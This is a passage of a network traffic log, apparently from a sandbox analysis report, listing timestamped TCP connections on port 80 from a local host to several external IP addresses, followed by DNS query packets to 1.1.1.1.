                                                                                                                        Nov 21, 2024 16:22:41.402344942 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:41.402447939 CET5000380192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:41.420078993 CET5000380192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:41.539803982 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:42.641472101 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:42.641494989 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:42.641674995 CET5000380192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:42.642147064 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:42.642509937 CET8050003172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:42.642704010 CET5000380192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:42.922195911 CET5000380192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:43.944901943 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:44.065036058 CET8050004172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:44.065388918 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:44.083441973 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:44.203090906 CET8050004172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:45.356559038 CET8050004172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:45.356585026 CET8050004172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:45.356630087 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:45.357093096 CET8050004172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:45.357137918 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:45.593967915 CET5000480192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:46.660904884 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:46.781374931 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:46.781752110 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:46.856908083 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:46.976762056 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:46.976804972 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037244081 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037290096 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.037451029 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:48.038800001 CET8050005172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:48.038897991 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:48.360896111 CET5000580192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.469237089 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.589411974 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:49.589504957 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.609829903 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:49.729667902 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900764942 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900789976 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.900922060 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:50.901216030 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:50.901308060 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:50.903964043 CET5000680192.168.2.9172.67.209.48
                                                                                                                        Nov 21, 2024 16:22:51.023521900 CET8050006172.67.209.48192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:56.338609934 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.458450079 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:56.460187912 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.474909067 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:56.594739914 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787565947 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787691116 CET8050007209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:57.787740946 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:57.984829903 CET5000780192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.004297018 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.124380112 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:59.124485016 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.142610073 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:22:59.262743950 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.512301922 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.512947083 CET8050008209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:00.513467073 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:00.656927109 CET5000880192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.675240040 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.795125961 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:01.795226097 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.810756922 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:01.930386066 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:01.930490017 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175116062 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175162077 CET8050009209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:03.175204992 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:03.312709093 CET5000980192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.332082033 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.452008963 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:04.452114105 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.464939117 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:04.584744930 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.724932909 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.724993944 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:05.725096941 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:05.727904081 CET5001080192.168.2.9209.74.77.109
                                                                                                                        Nov 21, 2024 16:23:05.847909927 CET8050010209.74.77.109192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:11.358422041 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.478346109 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:11.478430033 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.495727062 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:11.615855932 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848418951 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848447084 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.848645926 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:12.850280046 CET8050011161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:12.850379944 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:13.000293970 CET5001180192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.021055937 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.146291971 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:14.153067112 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.169044971 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:14.288733006 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442529917 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442589998 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442631006 CET8050012161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:15.442631960 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:15.442676067 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:15.672111988 CET5001280192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.692951918 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.817971945 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:16.818068981 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.833781958 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:16.960520029 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:16.960566998 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.152887106 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.152946949 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.153083086 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:18.233479977 CET8050013161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:18.236877918 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:18.344161987 CET5001380192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.363152981 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.482825994 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:19.482944012 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.493277073 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:19.612986088 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782006979 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782027006 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782042027 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782058954 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:20.782174110 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.782174110 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.787079096 CET5001480192.168.2.9161.97.142.144
                                                                                                                        Nov 21, 2024 16:23:20.909197092 CET8050014161.97.142.144192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:26.927980900 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.048069000 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:27.048156023 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.061866999 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:27.181935072 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410809994 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410867929 CET8050015185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:28.410936117 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:28.579005003 CET5001580192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.597883940 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.717755079 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:29.717869043 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.737035036 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:29.856868982 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088588953 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088802099 CET8050016185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:31.088866949 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:31.250345945 CET5001680192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.269412041 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.389300108 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:32.389451027 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.408984900 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:32.528709888 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:32.528754950 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694612026 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694823027 CET8050017185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:33.694881916 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:33.906560898 CET5001780192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:34.925988913 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.045823097 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:35.045903921 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.057307959 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:35.177155972 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.403729916 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.404100895 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:36.404201031 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:36.407860994 CET5001880192.168.2.9185.27.134.206
                                                                                                                        Nov 21, 2024 16:23:36.527575016 CET8050018185.27.134.206192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:41.900022030 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.019994020 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:42.020165920 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.037542105 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:42.157202005 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312037945 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312063932 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312114954 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:43.312809944 CET8050019104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:43.312855005 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:43.547199965 CET5001980192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:44.566102028 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:44.685959101 CET8050020104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:44.687146902 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:44.702689886 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:44.822560072 CET8050020104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:46.146347046 CET8050020104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:46.146656990 CET8050020104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:46.146692038 CET8050020104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:46.146753073 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:46.146864891 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:46.219103098 CET5002080192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:47.246718884 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:47.366437912 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:47.366518021 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:47.383749008 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:47.503520966 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:47.503573895 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:48.760806084 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:48.760831118 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:48.760914087 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:48.761543036 CET8050021104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:48.761996984 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:48.891000032 CET5002180192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:49.918258905 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:50.038090944 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:50.038203955 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:50.057804108 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:50.177491903 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:51.334629059 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:51.335769892 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:51.335832119 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:51.335866928 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:51.335958004 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:51.339724064 CET5002280192.168.2.9104.21.62.184
                                                                                                                        Nov 21, 2024 16:23:51.459351063 CET8050022104.21.62.184192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:56.676175117 CET5002380192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:56.796583891 CET8050023104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:56.797246933 CET5002380192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:56.810878038 CET5002380192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:56.930735111 CET8050023104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:58.133624077 CET8050023104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:58.135015011 CET8050023104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:58.141108036 CET5002380192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:58.315115929 CET5002380192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:59.331530094 CET5002480192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:59.451407909 CET8050024104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:59.451494932 CET5002480192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:59.469146967 CET5002480192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:23:59.589436054 CET8050024104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:00.716937065 CET8050024104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:00.720011950 CET8050024104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:00.720477104 CET5002480192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:00.987374067 CET5002480192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:02.005409002 CET5002580192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:02.125088930 CET8050025104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:02.133050919 CET5002580192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:02.145051003 CET5002580192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:02.264970064 CET8050025104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:02.265033960 CET8050025104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:03.413825035 CET8050025104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:03.415605068 CET8050025104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:03.415664911 CET5002580192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:03.656816959 CET5002580192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:04.675482988 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:04.795213938 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:04.797316074 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:04.807034969 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:04.926712990 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:05.987823963 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:05.987845898 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:05.987960100 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:05.988827944 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:05.988871098 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:05.991818905 CET5002680192.168.2.9104.21.58.90
                                                                                                                        Nov 21, 2024 16:24:06.112889051 CET8050026104.21.58.90192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:11.348372936 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:11.468287945 CET8050027172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:11.468378067 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:11.483397007 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:11.606358051 CET8050027172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:12.643196106 CET8050027172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:12.645181894 CET8050027172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:12.645407915 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:12.645540953 CET8050027172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:12.646079063 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:12.984755039 CET5002780192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:15.238018990 CET5002880192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:15.357966900 CET8050028172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:15.358056068 CET5002880192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:15.373236895 CET5002880192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:15.492897034 CET8050028172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:16.492039919 CET8050028172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:16.492265940 CET8050028172.67.192.207192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:16.492331982 CET5002880192.168.2.9172.67.192.207
                                                                                                                        Nov 21, 2024 16:24:16.875452042 CET5002880192.168.2.9172.67.192.207

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 21, 2024 16:20:33.246639967 CET5233453192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:20:34.209563017 CET53523341.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:51.066520929 CET4961153192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:20:51.854418993 CET53496111.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:06.644542933 CET5620253192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:07.401488066 CET53562021.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:21.695173025 CET6272553192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:22.703270912 CET6272553192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:22.827137947 CET53627251.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:22.839989901 CET53627251.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:37.316838980 CET5282153192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:38.312980890 CET5282153192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:38.364248991 CET53528211.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:38.450680017 CET53528211.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:52.883775949 CET5574653192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:53.890899897 CET5574653192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:21:54.049530983 CET53557461.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:54.049571991 CET53557461.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:08.847954035 CET5462753192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:22:09.487808943 CET53546271.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:25.489792109 CET5832353192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:22:26.237521887 CET53583231.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:40.956830025 CET5223853192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:22:41.276529074 CET53522381.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:22:55.910799026 CET5071153192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:22:56.336155891 CET53507111.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:10.738986015 CET5214853192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:23:11.355724096 CET53521481.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:25.802378893 CET5116353192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:23:26.797244072 CET5116353192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:23:26.924962044 CET53511631.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:26.935272932 CET53511631.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:41.435561895 CET5340353192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:23:41.896976948 CET53534031.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:23:56.347815990 CET6310753192.168.2.91.1.1.1
                                                                                                                        Nov 21, 2024 16:23:56.670701981 CET53631071.1.1.1192.168.2.9
                                                                                                                        Nov 21, 2024 16:24:11.005058050 CET5725253192.168.2.91.1.1.1
